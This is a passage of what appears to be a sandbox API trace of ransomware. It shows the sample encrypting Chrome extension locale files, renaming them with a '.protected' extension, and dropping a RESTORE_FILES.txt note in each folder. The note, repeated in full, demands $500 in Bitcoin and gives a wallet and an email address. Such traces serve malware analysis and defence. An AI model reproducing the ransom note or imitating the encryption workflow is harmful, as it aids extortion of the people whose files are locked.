dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.708] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json") returned 157 [0079.708] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.708] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json") returned 157 [0079.708] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.708] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json") returned 157 [0079.708] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.709] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.709] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.709] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.709] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.709] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.710] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.710] CloseHandle (hObject=0x168) returned 1 [0079.710] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json.protected") returned 167 [0079.710] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json.protected")) returned 1 [0079.710] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.710] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.710] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\RESTORE_FILES.txt") returned 161 [0079.710] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.711] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.711] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.711] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.711] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.711] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.711] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.711] CloseHandle (hObject=0x164) returned 1 [0079.712] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.712] lstrcmpiW (lpString1="ca", lpString2="Windows") returned -1 [0079.712] lstrcmpiW (lpString1="ca", lpString2="Program Files") returned -1 [0079.712] lstrcmpiW (lpString1="ca", lpString2="Program Files (x86)") returned -1 [0079.712] lstrcmpiW (lpString1="ca", lpString2="$Recycle.bin") returned 1 [0079.712] lstrcmpiW (lpString1="ca", lpString2="System Volume Information") returned -1 [0079.712] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca") returned 143 [0079.712] lstrcmpW (lpString1="ca", lpString2=".") returned 1 [0079.712] lstrcmpW (lpString1="ca", lpString2="..") returned 1 [0079.712] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\*") returned 145 [0079.712] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.712] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.712] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.712] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.712] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.712] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.712] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\.") returned 145 [0079.712] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.712] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.712] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.712] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.712] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.712] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.712] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.712] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\..") returned 146 [0079.712] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.712] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.712] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.712] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.712] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.712] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.712] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.712] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.712] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json") returned 157 [0079.712] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.712] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.713] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.713] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.713] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.713] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json") returned 157 [0079.713] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.713] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json") returned 157 [0079.713] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.713] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json") returned 157 [0079.713] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.713] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.714] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.714] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.714] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.714] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.714] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.714] CloseHandle (hObject=0x168) returned 1 [0079.714] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json.protected") returned 167 [0079.714] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json.protected")) returned 1 [0079.715] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.715] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.715] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\RESTORE_FILES.txt") returned 161 [0079.715] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.715] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.715] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.716] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.716] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.716] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.716] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.716] CloseHandle (hObject=0x164) returned 1 [0079.716] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.716] lstrcmpiW (lpString1="cs", lpString2="Windows") returned -1 [0079.716] lstrcmpiW (lpString1="cs", lpString2="Program Files") returned -1 [0079.716] lstrcmpiW (lpString1="cs", lpString2="Program Files (x86)") returned -1 [0079.716] lstrcmpiW (lpString1="cs", lpString2="$Recycle.bin") returned 1 [0079.716] lstrcmpiW (lpString1="cs", lpString2="System Volume Information") returned -1 [0079.716] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs") returned 143 [0079.716] lstrcmpW (lpString1="cs", lpString2=".") returned 1 [0079.716] lstrcmpW (lpString1="cs", lpString2="..") returned 1 [0079.716] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\*") returned 145 [0079.716] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.717] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.717] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.717] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.717] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.717] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.717] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\.") returned 145 [0079.717] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.717] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.717] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.717] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.717] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.717] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.717] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.717] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\..") returned 146 [0079.717] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.717] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.717] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.717] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.717] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.717] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.717] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.717] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.717] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json") returned 157 [0079.717] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.717] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.717] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.718] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.718] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.718] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 